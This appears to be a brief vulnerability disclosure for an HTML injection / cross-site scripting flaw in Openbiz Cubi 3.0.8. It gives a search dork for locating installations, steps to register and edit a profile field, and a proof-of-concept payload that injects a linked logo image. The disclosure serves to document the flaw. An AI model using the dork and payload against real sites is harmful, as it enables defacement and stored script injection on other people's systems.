====================================================================================================================================
| # Title : Openbiz Cubi 3.0.8 Xss/Html inject Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) |
| # Vendor : https://code.google.com/archive/p/openbiz-cubi/downloads |
| # Dork : " System Login - Cubi Platform " |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Register new user .
[+] go to your profile and edit Miscellaneous .
[+] Use Payload :
</tr>
<td align="center"><a href="https://packetstormsecurity.com/files/authors/7697"><img src="https://packetstatic.com/img1398360120/ps_logo.png" alt="" width="650" height="120" border="0" /></a>
</tr>
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================